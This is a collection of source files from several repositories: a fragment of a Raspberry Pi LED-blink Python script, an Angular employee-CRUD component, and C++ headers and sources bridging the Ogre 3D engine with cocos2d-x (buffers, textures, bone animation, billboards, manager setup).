    GPIO.setup(pin,GPIO.OUT)
    # This loop runs forever and flashes the LED
    while True:
        GPIO.output(pin,GPIO.HIGH)
        print "se enciende el led"
        time.sleep(tiempo)
        GPIO.output(pin,GPIO.LOW)
        print "se apaga el led"
        time.sleep(tiempo)
try:
main()
except:
print "error happened"
| aeb073bad53649cbd957ec1d0d3790e2a75f1a6d | [
"Python"
] | 3 | Python | roclas/raspberry-pi-utils | 1641477915d7f2a28eaafae96529734f3279dd34 | 1cbb622aab512e8c1b44c8caadeff1494868954d |
refs/heads/master | <repo_name>luisgabriel84/angular-todo<file_sep>/src/app/app.component.ts
import { Component } from "@angular/core";
@Component({
  selector: "app-root",
  templateUrl: "./app.component.html",
  styleUrls: ["./app.component.css"]
})
/**
 * In-memory CRUD over a list of employees. The template binds to
 * `employees`, `model` (add form), `model2` (update form), `msg`
 * (alert banner) and `hideUpdate`.
 */
export class AppComponent {
  title = "Angular Crud";
  /** Status message shown in the alert banner; empty string hides it. */
  msg = '';
  /** Hides the update form until an employee is being edited. */
  hideUpdate: boolean = true; // fixed: primitive `boolean`, not the `Boolean` wrapper object type
  employees = [
    { name: "Fatz",email:'<EMAIL>' ,position: "Manager" },
    { name: "Juan ",email:'<EMAIL>', position: "Developer" },
    { name: "Pedro",email:'<EMAIL>', position: "Designer" }
  ];
  /** Model bound to the "add employee" form. */
  model: any = {};
  /** Model bound to the "update employee" form. */
  model2: any = {};
  /** Index of the employee currently being edited (set by editEmployee). */
  myValue;

  /** Append the add-form model to the list and reset the form. */
  addEmployee(): void {
    this.employees.push(this.model);
    this.model = {};
    this.msg = "Se guardo el empleado satisfactoriamente";
  }

  /** Remove the employee at index `i` after user confirmation. */
  deleteEmployee(i): void {
    const answer = confirm("Estas seguro de querer eliminar?"); // fixed: const, not var
    if (answer) {
      this.employees.splice(i, 1);
      this.msg = "Empleado eliminado";
    }
  }

  /** Copy employee `i` into the update form and remember its index. */
  editEmployee(i): void {
    this.hideUpdate = false;
    this.model2.name = this.employees[i].name;
    this.model2.email = this.employees[i].email;
    this.model2.position = this.employees[i].position;
    this.myValue = i;
  }

  /** Write the update form back over the remembered employee. */
  updateEmployee(): void {
    // Fixed: replaced a pointless O(n) scan (for j ... if j == i) with a
    // direct index assignment; behavior is identical for valid indices.
    this.employees[this.myValue] = this.model2;
    this.model2 = {};
    this.msg = "Empleado actualizado";
    this.hideUpdate = true;
  }

  /** Dismiss the alert banner. */
  closeAlert(): void {
    this.msg = "";
  }
}
| f47b9ec04d48abcec8340812e2b2cba8e29530b6 | [
"TypeScript"
] | 1 | TypeScript | luisgabriel84/angular-todo | e52fa1355e77cedec39359b2c9212f09ee7c20ad | 38b9af9fcb88c867713d9bc148e64dc00616ac38 |
refs/heads/master | <file_sep>#ifndef OGRE_BRIDGE_BUFFER_MANAGER_H
#define OGRE_BRIDGE_BUFFER_MANAGER_H
#include "cocos2d.h"
#include "OgrePrerequisites.h"
#include "OgreHardwareBufferManager.h"
#include "OgreHardwareVertexBuffer.h"
#include "OgreHardwareIndexBuffer.h"
NS_CC_BEGIN
class EventListenerCustom;
NS_CC_END
namespace Ogre {
	/** Vertex buffer backed by a GL VBO, bridging Ogre's hardware-buffer
	    interface onto the cocos2d-x GL context. Re-registers its VBO via a
	    cocos EventListenerCustom (presumably on GL context recreation --
	    TODO confirm against the .cpp). */
	class BridgeHardwareVertexBuffer : public HardwareVertexBuffer
	{
	private:
		mutable GLuint _vbo;                    // GL buffer object id, see getGLBufferId()
		cocos2d::EventListenerCustom * _recreateVBOEventListener;
		// Scratch buffer handling
		bool mLockedToScratch;
		size_t mScratchOffset;
		size_t mScratchSize;
		void* mScratchPtr;
		bool mScratchUploadOnUnlock;
	protected:
		void* lockImpl(size_t offset, size_t length, LockOptions options);
		void unlockImpl(void);
	public:
		BridgeHardwareVertexBuffer(HardwareBufferManagerBase* mgr, size_t vertexSize, size_t numVertices,
			HardwareBuffer::Usage usage, bool useShadowBuffer);
		virtual ~BridgeHardwareVertexBuffer();
		void readData(size_t offset, size_t length, void* pDest);
		void writeData(size_t offset, size_t length,
			const void* pSource, bool discardWholeBuffer = false);
		void _updateFromShadow(void);
		/// Raw GL buffer object id backing this vertex buffer.
		inline GLuint getGLBufferId(void) const { return _vbo; }
	};
	/** Index buffer backed by a GL VBO; mirrors BridgeHardwareVertexBuffer,
	    including the scratch-pool lock path. */
	class BridgeHardwareIndexBuffer : public HardwareIndexBuffer
	{
	private:
		mutable GLuint _vbo;                    // GL buffer object id, see getGLBufferId()
		cocos2d::EventListenerCustom * _recreateVBOEventListener;
		// Scratch buffer handling (used when a lock is served from the pool)
		bool mLockedToScratch;
		size_t mScratchOffset;
		size_t mScratchSize;
		void* mScratchPtr;
		bool mScratchUploadOnUnlock;
	protected:
		void* lockImpl(size_t offset, size_t length, LockOptions options);
		void unlockImpl(void);
	public:
		BridgeHardwareIndexBuffer(HardwareBufferManagerBase* mgr, IndexType idxType, size_t numIndexes,
			HardwareBuffer::Usage usage,
			bool useShadowBuffer);
		virtual ~BridgeHardwareIndexBuffer();
		void readData(size_t offset, size_t length, void* pDest);
		void writeData(size_t offset, size_t length,
			const void* pSource, bool discardWholeBuffer = false);
		void _updateFromShadow(void);
		/// Raw GL buffer object id backing this index buffer.
		inline GLuint getGLBufferId(void) const { return _vbo; }
	};
// Default threshold at which glMapBuffer becomes more efficient than glBufferSubData (32k?)
# define OGRE_GL_DEFAULT_MAP_BUFFER_THRESHOLD (1024 * 32)
/** Implementation of HardwareBufferManager for OpenGL ES. */
	/** HardwareBufferManager implementation for the cocos2d-x bridge render
	    system; owns the scratch memory pool shared by the buffers above. */
	class _OgreExport BridgeHardwareBufferManagerBase : public HardwareBufferManagerBase
	{
	protected:
		char* mScratchBufferPool;       // backing storage for allocateScratch()
		OGRE_MUTEX(mScratchMutex)
		size_t mMapBufferThreshold;     // see get/setGLMapBufferThreshold()
	public:
		BridgeHardwareBufferManagerBase();
		virtual ~BridgeHardwareBufferManagerBase();
		/// Creates a vertex buffer
		HardwareVertexBufferSharedPtr createVertexBuffer(size_t vertexSize,
			size_t numVerts, HardwareBuffer::Usage usage, bool useShadowBuffer = false);
		/// Create a hardware index buffer
		HardwareIndexBufferSharedPtr createIndexBuffer(
			HardwareIndexBuffer::IndexType itype, size_t numIndexes,
			HardwareBuffer::Usage usage, bool useShadowBuffer = false);
		/// Create a render to vertex buffer
		RenderToVertexBufferSharedPtr createRenderToVertexBuffer();
		/** Allocator method to allow us to use a pool of memory as a scratch
			area for hardware buffers. This is because glMapBuffer is incredibly
			inefficient, seemingly no matter what options we give it. So for the
			period of lock/unlock, we will instead allocate a section of a local
			memory pool, and use glBufferSubDataARB / glGetBufferSubDataARB
			instead.
		*/
		void* allocateScratch(uint32 size);
		/// @see allocateScratch
		void deallocateScratch(void* ptr);
		/** Threshold after which glMapBuffer is used and not glBufferSubData
		*/
		size_t getGLMapBufferThreshold() const;
		void setGLMapBufferThreshold( const size_t value );
	};
/// GLES2HardwareBufferManagerBase as a Singleton
	/** Singleton facade over BridgeHardwareBufferManagerBase; owns mImpl and
	    forwards the scratch-pool API to it. */
	class _OgreExport BridgeHardwareBufferManager : public HardwareBufferManager
	{
	public:
		BridgeHardwareBufferManager()
			: HardwareBufferManager(OGRE_NEW BridgeHardwareBufferManagerBase())
		{
		}
		~BridgeHardwareBufferManager()
		{
			OGRE_DELETE mImpl;
		}
		/** Allocator method to allow us to use a pool of memory as a scratch
			area for hardware buffers. This is because glMapBuffer is incredibly
			inefficient, seemingly no matter what options we give it. So for the
			period of lock/unlock, we will instead allocate a section of a local
			memory pool, and use glBufferSubDataARB / glGetBufferSubDataARB
			instead.
		*/
		void* allocateScratch(uint32 size)
		{
			return static_cast<BridgeHardwareBufferManagerBase*>(mImpl)->allocateScratch(size);
		}
		/// @see allocateScratch
		void deallocateScratch(void* ptr)
		{
			static_cast<BridgeHardwareBufferManagerBase*>(mImpl)->deallocateScratch(ptr);
		}
		/** Threshold after which glMapBuffer is used and not glBufferSubData
		*/
		size_t getGLMapBufferThreshold() const
		{
			return static_cast<BridgeHardwareBufferManagerBase*>(mImpl)->getGLMapBufferThreshold();
		}
		void setGLMapBufferThreshold( const size_t value )
		{
			static_cast<BridgeHardwareBufferManagerBase*>(mImpl)->setGLMapBufferThreshold(value);
		}
	};
}
#endif//OGREAPP_H
<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#ifndef __CCBones_Animation_H__
#define __CCBones_Animation_H__
#include <map>
#include <unordered_map>
#include "3d/CCAnimation3D.h"
#include "base/ccMacros.h"
#include "base/CCRef.h"
#include "2d/CCActionInterval.h"
NS_CC_BEGIN
class Bone3D;
class Sprite3D;
/**
* BonesAnimate3D, Animates a Sprite3D given with an Animation3D
*/
class BonesAnimate3D: public ActionInterval
{
public:
    /**create BonesAnimate3D using Animation.*/
    static BonesAnimate3D* create(Animation3D* animation,bool repeat = false,float transTime = 0.1f);
    /**
     * create BonesAnimate3D from a sub-range of an animation
     * @param animation used to generate BonesAnimate3D
     * @param repeat loop the animation when it reaches the end
     * @param fromTime start time within the animation, in seconds
     * @param duration Time the BonesAnimate3D lasts
     * @return BonesAnimate3D created using animate
     */
    static BonesAnimate3D* create(Animation3D* animation,bool repeat,float fromTime, float duration);
    /**
     * create BonesAnimate3D by frame section, [startFrame, endFrame)
     * @param animation used to generate BonesAnimate3D
     * @param repeat loop the animation when it reaches the end
     * @param startFrame first frame of the section (inclusive)
     * @param endFrame last frame of the section (exclusive)
     * @param frameRate default is 30 per second
     * @return BonesAnimate3D created using animate
     */
    static BonesAnimate3D* createWithFrames(Animation3D* animation,bool repeat,int startFrame, int endFrame, float frameRate = 30.f);
    //
    // Overrides
    //
    virtual void stop() override;
    virtual void step(float dt) override;
    virtual void startWithTarget(Node *target) override;
    virtual BonesAnimate3D* reverse() const override;
    virtual BonesAnimate3D *clone() const override;
    virtual void update(float t) override;
    virtual bool isDone() const;
    /**get & set speed, negative speed means playing reverse */
    float getSpeed() const;
    void setSpeed(float speed);
    /**get & set blend weight, weight must be positive*/
    float getWeight() const { return _weight; }
    void setWeight(float weight);
    float getAnimationLength() const { return _animationLength; }
    void setAnimationLength(float length) { _animationLength = length; }
    bool getRepeat() const { return _repeat; }
    void setRepeat(bool repeat) { _repeat = repeat; }
    /** animate transition time */
    float getTransitionTime() { return _transTime; }
    void setTransitionTime(float transTime) { _transTime = transTime; }
    /**get & set play reverse, these are deprecated, use set negative speed instead*/
    CC_DEPRECATED_ATTRIBUTE bool getPlayBack() const { return _playReverse; }
    CC_DEPRECATED_ATTRIBUTE void setPlayBack(bool reverse) { _playReverse = reverse; }
CC_CONSTRUCTOR_ACCESS:
    BonesAnimate3D();
    virtual ~BonesAnimate3D();
    // Remove this animate from the static per-sprite maps below.
    void removeFromMap();
protected:
    enum class BonesAnimationState
    {
        FadeIn,
        FadeOut,
        Running,
    };
    BonesAnimationState _state; //animation state
    Animation3D* _animation; //animation data
    bool _repeat;
    bool _isDone;
    float _transTime; //transition time from one BonesAnimate3D to another
    float _absSpeed; //playing speed
    float _weight; //blend weight
    float _start; //start time 0 - 1, used to generate sub BonesAnimate3D
    float _last; //last time 0 - 1, used to generate sub BonesAnimate3D
    bool _playReverse; // is playing reverse
    float _accTransTime; // accumulated transition time
    float _lastTime; // last t (0 - 1)
    float _animationLength; // the animation length (at speed 1)
    std::unordered_map<Bone3D*, Animation3D::Curve*> _boneCurves; //weak ref
    //sprite animates, keyed by the target Sprite3D
    static std::unordered_map<Sprite3D*, BonesAnimate3D*> s_fadeInAnimates;
    static std::unordered_map<Sprite3D*, BonesAnimate3D*> s_fadeOutAnimates;
    static std::unordered_map<Sprite3D*, BonesAnimate3D*> s_runningAnimates;
};
NS_CC_END
#endif // __CCBonesAnimation_H__
<file_sep>#ifndef OGRE_BRIDGE_TEXTURE_MANAGER_H
#define OGRE_BRIDGE_TEXTURE_MANAGER_H
#include "cocos2d.h"
#include "OgreTexture.h"
#include "OgreTextureManager.h"
NS_CC_BEGIN
class Texture2D;
NS_CC_END
namespace Ogre {
	/** Ogre Texture implementation whose GL object lives in the cocos2d-x
	    context; also keeps a list of cocos2d::Texture2D wrappers. */
	class BridgeTexture : public Texture
	{
	public:
		// Constructor
		BridgeTexture(ResourceManager* creator, const String& name, ResourceHandle handle,
			const String& group, bool isManual, ManualResourceLoader* loader);
		virtual ~BridgeTexture();
		void createRenderTexture();
		/// @copydoc Texture::getBuffer
		HardwarePixelBufferSharedPtr getBuffer(size_t face, size_t mipmap);
		// Takes the OGRE texture type (1d/2d/3d/cube) and returns the appropriate GL one
		GLenum getBridgeTextureTarget(void) const;
		/// Raw GL texture object id.
		GLuint getGLID() const{ return mTextureID;}
	protected:
		/// @copydoc Texture::createInternalResourcesImpl
		void createInternalResourcesImpl(void);
		/// @copydoc Resource::prepareImpl
		void prepareImpl(void);
		/// @copydoc Resource::unprepareImpl
		void unprepareImpl(void);
		/// @copydoc Resource::loadImpl
		void loadImpl(void);
		/// @copydoc Resource::freeInternalResourcesImpl
		void freeInternalResourcesImpl(void);
		/** Internal method, create GLHardwarePixelBuffers for every face and
			mipmap level. This method must be called after the GL texture object was created,
			the number of mipmaps was set (GL_TEXTURE_MAX_LEVEL) and glTexImageXD was called to
			actually allocate the buffer
		*/
		void _createSurfaceList();
		/// Used to hold images between calls to prepare and load.
		typedef SharedPtr<vector<Image>::type > LoadedImages;
		/** Vector of images that were pulled from disk by
			prepareLoad but have yet to be pushed into texture memory
			by loadImpl. Images should be deleted by loadImpl and unprepareImpl.
		*/
		LoadedImages mLoadedImages;
	private:
		GLuint mTextureID;          // GL texture object id
		typedef vector<cocos2d::Texture2D *>::type CocosTextureList;
		CocosTextureList mCocosTextureList;   // cocos-side wrappers for this texture
	};
/** Specialisation of SharedPtr to allow SharedPtr to be assigned to GLES2TexturePtr
@note Has to be a subclass since we need operator=.
We could templatise this instead of repeating per Resource subclass,
except to do so requires a form VC6 does not support i.e.
ResourceSubclassPtr<T> : public SharedPtr<T>
*/
	/** SharedPtr subclass providing ResourcePtr/TexturePtr conversions,
	    following Ogre's standard per-resource smart-pointer boilerplate
	    (see the class comment above). All conversions copy the use-count
	    pointer under the source pointer's mutex. */
	class BridgeTexturePtr : public SharedPtr<BridgeTexture>
	{
	public:
		BridgeTexturePtr() : SharedPtr<BridgeTexture>() {}
		explicit BridgeTexturePtr(BridgeTexture* rep) : SharedPtr<BridgeTexture>(rep) {}
		BridgeTexturePtr(const BridgeTexturePtr& r) : SharedPtr<BridgeTexture>(r) {}
		// NOTE(review): unlike the operator= overloads below, this constructor
		// has no else-branch for a mutex-less (null) source; the pointer simply
		// stays null in that case.
		BridgeTexturePtr(const ResourcePtr& r) : SharedPtr<BridgeTexture>()
		{
			// lock & copy other mutex pointer
			OGRE_MUTEX_CONDITIONAL(r.OGRE_AUTO_MUTEX_NAME)
			{
				OGRE_LOCK_MUTEX(*r.OGRE_AUTO_MUTEX_NAME)
				OGRE_COPY_AUTO_SHARED_MUTEX(r.OGRE_AUTO_MUTEX_NAME)
				pRep = static_cast<BridgeTexture*>(r.getPointer());
				pUseCount = r.useCountPointer();
				if (pUseCount)
				{
					++(*pUseCount);
				}
			}
		}
		BridgeTexturePtr(const TexturePtr& r) : SharedPtr<BridgeTexture>()
		{
			*this = r;
		}
		/// Operator used to convert a ResourcePtr to a GLESTexturePtr
		BridgeTexturePtr& operator=(const ResourcePtr& r)
		{
			if (pRep == static_cast<BridgeTexture*>(r.getPointer()))
			{
				return *this;
			}
			release();
			// lock & copy other mutex pointer
			OGRE_MUTEX_CONDITIONAL(r.OGRE_AUTO_MUTEX_NAME)
			{
				OGRE_LOCK_MUTEX(*r.OGRE_AUTO_MUTEX_NAME)
				OGRE_COPY_AUTO_SHARED_MUTEX(r.OGRE_AUTO_MUTEX_NAME)
				pRep = static_cast<BridgeTexture*>(r.getPointer());
				pUseCount = r.useCountPointer();
				if (pUseCount)
				{
					++(*pUseCount);
				}
			}
			else
			{
				// RHS must be a null pointer
				assert(r.isNull() && "RHS must be null if it has no mutex!");
				setNull();
			}
			return *this;
		}
		/// Operator used to convert a TexturePtr to a GLESTexturePtr
		BridgeTexturePtr& operator=(const TexturePtr& r)
		{
			if (pRep == static_cast<BridgeTexture*>(r.getPointer()))
				return *this;
			release();
			// lock & copy other mutex pointer
			OGRE_MUTEX_CONDITIONAL(r.OGRE_AUTO_MUTEX_NAME)
			{
				OGRE_LOCK_MUTEX(*r.OGRE_AUTO_MUTEX_NAME)
				OGRE_COPY_AUTO_SHARED_MUTEX(r.OGRE_AUTO_MUTEX_NAME)
				pRep = static_cast<BridgeTexture*>(r.getPointer());
				pUseCount = r.useCountPointer();
				if (pUseCount)
				{
					++(*pUseCount);
				}
			}
			else
			{
				// RHS must be a null pointer
				assert(r.isNull() && "RHS must be null if it has no mutex!");
				setNull();
			}
			return *this;
		}
	};
/** GL ES-specific implementation of a TextureManager */
	/** GL ES-specific implementation of a TextureManager */
	class BridgeHardwareTextureManager : public TextureManager
	{
	public:
		BridgeHardwareTextureManager();
		virtual ~BridgeHardwareTextureManager();
		/// Create the warning texture (bound when a texture unit is blank).
		void createWarningTexture();
		GLuint getWarningTextureID() { return mWarningTextureID; }
		/// @copydoc TextureManager::getNativeFormat
		PixelFormat getNativeFormat(TextureType ttype, PixelFormat format, int usage);
		/// @copydoc TextureManager::isHardwareFilteringSupported
		bool isHardwareFilteringSupported(TextureType ttype, PixelFormat format, int usage,
			bool preciseFormatOnly = false);
	protected:
		/// @copydoc ResourceManager::createImpl
		Resource* createImpl(const String& name, ResourceHandle handle,
			const String& group, bool isManual, ManualResourceLoader* loader,
			const NameValuePairList* createParams);
		/// GL id of the warning texture created by createWarningTexture().
		GLuint mWarningTextureID;
	};
}
#endif
<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "CameraBillBoard.h"
#include "base/CCDirector.h"
#include "2d/CCCamera.h"
#include "renderer/CCRenderer.h"
#include "renderer/CCGLProgramCache.h"
NS_CC_BEGIN
// Visit override: when the transform is dirty, give each child an extra
// transform that cancels its world rotation (rotating around its scaled
// anchor point) so children always face the camera -- the billboard effect.
void CameraBillBoard::visit(Renderer* renderer, const Mat4 &parentTransform, uint32_t parentFlags)
{
    // quick return if not visible. children won't be drawn.
    if (!_visible)
    {
        return;
    }

    uint32_t flags = processParentFlags(parentTransform, parentFlags);

    // IMPORTANT:
    // To ease the migration to v3.0, we still support the Mat4 stack,
    // but it is deprecated and your code should not rely on it
    Director* director = Director::getInstance();
    director->pushMatrix(MATRIX_STACK_TYPE::MATRIX_STACK_MODELVIEW);
    director->loadMatrix(MATRIX_STACK_TYPE::MATRIX_STACK_MODELVIEW, _modelViewTransform);

    if (flags & FLAGS_DIRTY_MASK)
    {
        if(!_children.empty())
        {
            sortAllChildren();
            cocos2d::Quaternion rotation;
            for(auto it=_children.cbegin(); it != _children.cend(); ++it)
            {
                // Clear any previous billboard transform before reading the
                // child's current world transform.
                (*it)->setAdditionalTransform(nullptr);
                Vec2 anchorPointInPoints;
                anchorPointInPoints = (*it)->getAnchorPointInPoints();
                // Anchor scaled into this node's space: the pivot for the
                // counter-rotation below.
                Vec2 anchorPoint;
                anchorPoint.x = anchorPointInPoints.x * _scaleX;
                anchorPoint.y = anchorPointInPoints.y * _scaleY;
                Mat4 additional = (*it)->getNodeToWorldTransform();
                additional.getRotation(&rotation);
                // Invert the accumulated world rotation so the child ends up
                // unrotated (i.e. screen/camera aligned).
                rotation.inverse();
                // translate(anchor) * inverseRotation * translate(-anchor):
                // rotate about the anchor point rather than the origin.
                Mat4 moveRotation = Mat4::IDENTITY;
                moveRotation.translate(anchorPoint.x,anchorPoint.y,0);
                Mat4 cameraRotation;
                Mat4::createRotation(rotation,&cameraRotation);
                moveRotation = moveRotation * cameraRotation;
                moveRotation.translate(-anchorPoint.x,-anchorPoint.y,0);
                (*it)->setAdditionalTransform(&moveRotation);
                (*it)->visit(renderer, _modelViewTransform, flags);
            }
        }
    }
    else
    {
        // NOTE(review): on the non-dirty path the children keep whatever
        // additional transform was computed last -- confirm this is the
        // intended caching behavior.
        if(!_children.empty())
        {
            sortAllChildren();
            for(auto it=_children.cbegin(); it != _children.cend(); ++it)
                (*it)->visit(renderer, _modelViewTransform, flags);
        }
    }

    director->popMatrix(MATRIX_STACK_TYPE::MATRIX_STACK_MODELVIEW);

    // FIX ME: Why need to set _orderOfArrival to 0??
    // Please refer to https://github.com/cocos2d/cocos2d-x/pull/6920
    // reset for next frame
    // _orderOfArrival = 0;
}
NS_CC_END<file_sep>#include "ScriptCallFuncHelper.h"
NS_CC_BEGIN
// Standard cocos2d-x two-phase factory: allocate, autorelease, return.
// Returns nullptr if allocation fails.
ScriptCallFuncHelper *ScriptCallFuncHelper::create()
{
	ScriptCallFuncHelper *helper = new (std::nothrow) ScriptCallFuncHelper();
	if (helper == nullptr)
	{
		CC_SAFE_DELETE(helper);
		return nullptr;
	}
	helper->autorelease();
	return helper;
}
// Convenience factory: create a helper already bound to script handler `id`.
ScriptCallFuncHelper *ScriptCallFuncHelper::create(int id)
{
	ScriptCallFuncHelper *helper = ScriptCallFuncHelper::create();
	if (helper != nullptr)
	{
		helper->addScriptListener(id);
	}
	return helper;
}
// Invoke the registered script dispatcher with `value` and the stored
// handler id; no-op when no handler or dispatcher is set.
// (Name "excuteScript" [sic] is part of the public interface.)
void ScriptCallFuncHelper::excuteScript(const Value &value)
{
	if(mhandlerId && mScriptManagerHandler)
	{
		mScriptManagerHandler(value,mhandlerId);
	}
}
// Bind a script-side handler id; 0 means "no handler".
void ScriptCallFuncHelper::addScriptListener(int id)
{
	mhandlerId = id;
}
// Unbind the script handler (excuteScript becomes a no-op).
void ScriptCallFuncHelper::removeScriptListener()
{
	mhandlerId = 0;
}
// Install the dispatcher that routes (value, id) pairs into the script VM.
void ScriptCallFuncHelper::registerScriptManager(const std::function<void(const Value &value,int id)>& func)
{
	mScriptManagerHandler = func;
}
ScriptCallFuncHelper::ScriptCallFuncHelper()
:mhandlerId(0)
{
}
ScriptCallFuncHelper::~ScriptCallFuncHelper()
{
	mhandlerId = 0;
}
NS_CC_END<file_sep>#include "OgreOgreManager.h"
#include <Ogre.h>
#include <OgreFontManager.h>
#include <OgreParticleFXPlugin.h>
#include <ParticleUniversePlugin.h>
#include <ParticleUniverseSystemManager.h>
#include "components/OgreBridgeImageCodec.h"
#include "components/OgreBridgeSceneManager.h"
#include "components/OgreBridgeFileSystemArchive.h"
#include "components/OgreBridgeBufferManager.h"
#include "components/OgreBridgeTextureManager.h"
#include "components/OgreBridgeRenderSystem.h"
#include "components/OgreBridgeRenderSystemPlugin.h"
#include "components/OgreBridgeWindow.h"
#include "cocos2d.h"
NS_CC_BEGIN
//-----------------------------------------------------------------------
static OgreManager *s_BridgeRootManage = NULL;
//-----------------------------------------------------------------------
// All OGRE objects start null; they are created lazily in initialize().
OgreManager::OgreManager():
	mRoot(NULL),
	mCamera(NULL),
	mWindow(NULL),
	mSceneMgr(NULL)
{}
OgreManager::~OgreManager()
{
}
// Lazily-created process-wide singleton.
// NOTE(review): no locking here -- confirm this is only called from the
// main/GL thread.
OgreManager *OgreManager::getInstance()
{
	if (!s_BridgeRootManage)
	{
		s_BridgeRootManage = new OgreManager();
	}
	return s_BridgeRootManage;
}
// One-time OGRE bootstrap: create the Root, install the bridge/particle
// plugins, select the bridge render system, then build window, scene
// manager, camera and viewport, and register the resource location.
// Idempotent: does nothing if the Root already exists.
// (fixed: removed unused locals `director`, `origin`, `visibleSize`;
//  translated the Chinese comments)
void OgreManager::initialize()
{
	if(!mRoot)
	{
		// Create the Root; it must exist before any other OGRE call.
		mRoot = new Ogre::Root();
		//mRoot->installPlugin(new Ogre::GLES2Plugin());
		mRoot->installPlugin(new Ogre::ParticleFXPlugin());
		mRoot->installPlugin(new Ogre::BridgeRenderSystemPlugin());
		mRoot->installPlugin(new ParticleUniverse::ParticleUniversePlugin());
		Ogre::BridgeImageCodec::startup();
		mRoot->addSceneManagerFactory(new Ogre::BridgeSceneManagerFactory());
		Ogre::ArchiveManager::getSingleton().addArchiveFactory(new Ogre::BridgeFileSystemArchiveFactory());
		mRoot->initialise();
		// Select the bridge render system.
		mRenderSystem = mRoot->getRenderSystemByName("Bridge Rendering Subsystem");
		mRoot->setRenderSystem(mRenderSystem);
		/*mRoot->initialise(false);*/
		mWindow = OGRE_NEW Ogre::BridgeWindow();
		mSceneMgr = static_cast<Ogre::BridgeSceneManager*>(mRoot->createSceneManager(Ogre::ST_GENERIC, Ogre::BridgeSceneManagerFactory::FACTORY_TYPE_NAME));
		//mSceneMgr->setViewport();
		// Camera looks down +Z; the roll/pitch flips adapt OGRE's
		// coordinate convention to the cocos2d-x one.
		mCamera = mSceneMgr->createCamera("PlayerCam");
		mCamera->lookAt(Ogre::Vector3(0,0,1));
		mCamera->roll(Ogre::Degree(180));
		//mCamera->yaw(Ogre::Degree(180));
		mCamera->pitch(Ogre::Degree(180));
		// NOTE(review): viewport size is hard-coded to 1280x800 -- confirm
		// it should not follow the director's visible size instead.
		mViewport = OGRE_NEW Ogre::Viewport(mCamera, mWindow, 0, 0, 1280, 800, 0);
		mViewport->setCamera(mCamera);
		mViewport->setClearEveryFrame(false);
		/*auto data = new Ogre::RenderTarget();
		mViewport = OGRE_NEW Ogre::Viewport(mCamera, new Ogre::RenderTarget(), 0, 0, 1280, 800, 0);
		mCamera->_notifyViewport(mViewport);
		mViewport->setClearEveryFrame(false);
		mViewport->setBackgroundColour(Ogre::ColourValue(255, 255, 255));
		// Match the camera aspect ratio to the viewport (width / height).
		mCamera->setAspectRatio(Ogre::Real(mViewport->getActualWidth()) / Ogre::Real(mViewport->getActualHeight()));
		*/
		mCamera->setAspectRatio(Ogre::Real(mViewport->getActualWidth()) / Ogre::Real(mViewport->getActualHeight()));
		mSceneMgr->initSceneManager(mViewport, mCamera, cocos2d::GLProgramCache::getInstance()->getGLProgram(cocos2d::GLProgram::SHADER_NAME_POSITION_TEXTURE_COLOR));
		Ogre::ResourceGroupManager::getSingleton()
			.addResourceLocation("LocationGeneral", "BridgeFileSystem");
	}
}
// Accessors for the objects built in initialize(); all return NULL before
// initialize() has been called.
Ogre::Camera* OgreManager::getCamera(){ return mCamera;}
Ogre::RenderSystem* OgreManager::getRenderSystem(){ return mRenderSystem;}
Ogre::SceneManager* OgreManager::getSceneManager(){ return mSceneMgr;}
void OgreManager::purge()
{
if(mRoot)
{
delete mRoot;
mRoot = NULL;
}
}
// Create a ParticleUniverse system of template `typeName` named
// `entityName` in our scene manager. Returns NULL when either the scene
// manager or the particle-system manager is unavailable.
ParticleUniverse::ParticleSystem* OgreManager::createParticleSystem(const std::string &typeName,const std::string &entityName)
{
	if (!mSceneMgr)
		return NULL;
	ParticleUniverse::ParticleSystemManager* particleMgr = ParticleUniverse::ParticleSystemManager::getSingletonPtr();
	if (!particleMgr)
		return NULL;
	return particleMgr->createParticleSystem(entityName, typeName, mSceneMgr);
}
// Destroy a particle system previously created via createParticleSystem.
// No-op when the scene manager or particle manager is unavailable.
// (fixed: removed an unused local `ret` copy-pasted from createParticleSystem)
void OgreManager::destroyParticleSystem(ParticleUniverse::ParticleSystem* particleSystem)
{
	if (mSceneMgr)
	{
		ParticleUniverse::ParticleSystemManager *pManager = ParticleUniverse::ParticleSystemManager::getSingletonPtr();
		if (pManager)
		{
			pManager->destroyParticleSystem(particleSystem, mSceneMgr);
		}
	}
}
// Create a mesh entity from `fileName`; NULL if no scene manager exists.
Ogre::Entity* OgreManager::createEntity(const std::string &fileName)
{
	return mSceneMgr ? mSceneMgr->createEntity(fileName) : NULL;
}
